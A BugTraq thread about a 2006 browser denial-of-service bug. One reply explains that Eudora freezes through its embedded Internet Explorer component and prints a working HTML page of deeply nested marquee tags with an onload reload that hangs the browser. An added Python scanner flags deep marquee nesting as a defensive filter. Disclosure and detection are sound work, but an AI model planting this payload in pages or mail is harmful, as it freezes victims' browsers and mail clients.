BugTraq
Fire fox dos exploit May 30 2006 12:03PM
co296 aol com (2 replies)
Re: Fire fox dos exploit May 31 2006 02:50PM
Josh Zlatin-Amishav (josh tkos co il) (5 replies)
Re: Fire fox dos exploit Jun 01 2006 08:00PM
Aaron Hopkins (lists die net)
Re: Fire fox dos exploit May 31 2006 08:14PM
Phil Trainor (ptrainor imperfectnetworks com)
Re: Fire fox dos exploit May 31 2006 05:28PM
Yannick von Arx (yannick vonarx yanux ch)
Re: Fire fox dos exploit May 31 2006 05:08PM
Ronald van den Blink (ronald securityview org)
RE: Fire fox dos exploit May 31 2006 04:22PM
Andy (andy nds uk com) (1 replies)
RE: Fire fox dos exploit Jun 05 2006 03:49AM
Sanjay Rawat (sanjayr intoto com) (1 replies)
RE: Fire fox dos exploit Jun 07 2006 10:43AM
Jaroslaw Sajko (sloik parareal net)
On Mon, 05-06-2006 at 09:19 +0530, Sanjay Rawat wrote:
> I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to
> open the original mail in the Eudora mail client, and whenever I clicked on
> the mail, Eudora stopped responding. I had to restart the application.
>
> regards
> -Sanjay Rawat

Yes, it's because Eudora uses the Internet_Explorer_Server component to
display the content of the email. And the previously mentioned DoS case
with the nested <marquee> tags concerns Internet Explorer as well.

If you want to trigger this DoS under IExplorer, you have to include
the <style></style> tags on two separate lines and you have to refresh
the page; only the second page fetch freezes the browser.

Tested on 6.0.2900.2180 XPSP2

Example is here:

--[cut]--

<html>
<head>
<style>
</style>
</head>
<body onload="javascript:window.location.reload(false)">
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

--[/cut]--

regards,
Jarek Sajko
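
A defensive check for the case described in this message, added here as an example and not part of the original post: it measures how deeply <marquee> elements nest inside each other in a piece of HTML, so a mail or web filter can flag such content before it reaches a renderer such as the embedded Internet Explorer component. The threshold MAX_DEPTH, the function names and the sample inputs are assumptions made for illustration.

```python
from html.parser import HTMLParser

MAX_DEPTH = 8  # assumed policy threshold, not a value from the post


class SelfNestingScanner(HTMLParser):
    """Records the deepest self-nesting seen for each watched element."""

    def __init__(self, watched):
        super().__init__(convert_charrefs=True)
        self.watched = frozenset(watched)
        self.open_now = dict.fromkeys(self.watched, 0)
        self.deepest = dict.fromkeys(self.watched, 0)

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag names, so <MARQUEE> is counted too.
        if tag in self.watched:
            self.open_now[tag] += 1
            self.deepest[tag] = max(self.deepest[tag], self.open_now[tag])

    def handle_endtag(self, tag):
        # Stray end tags must not push the counter below zero.
        if tag in self.watched and self.open_now[tag] > 0:
            self.open_now[tag] -= 1


def nesting_depth(html, watched=("marquee",)):
    """Return {element: deepest self-nesting} for the watched elements."""
    scanner = SelfNestingScanner(watched)
    scanner.feed(html)
    scanner.close()
    return scanner.deepest


def is_suspicious(html, limit=MAX_DEPTH):
    """True when any watched element nests deeper than the limit."""
    return any(depth > limit for depth in nesting_depth(html).values())


def build_nested(levels):
    """Constructed sample: `levels` marquee elements nested in each other."""
    return "<html><body>" + "<marquee>" * levels + "</marquee>" * levels + "</body></html>"


# Constructed benign sample: one marquee nested in another, plus a sibling.
BENIGN = "<p><marquee>news <marquee>ticker</marquee></marquee><marquee>x</marquee></p>"

if __name__ == "__main__":
    for name, doc in (("nested", build_nested(68)), ("benign", BENIGN)):
        print(name, nesting_depth(doc), "suspicious" if is_suspicious(doc) else "ok")
```

The scan is a single linear pass over the markup and never builds a DOM, so it can run on untrusted mail bodies without rendering them.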

Re: Fire fox dos exploit May 31 2006 01:59PM
pagvac (unknown pentester gmail com)


 
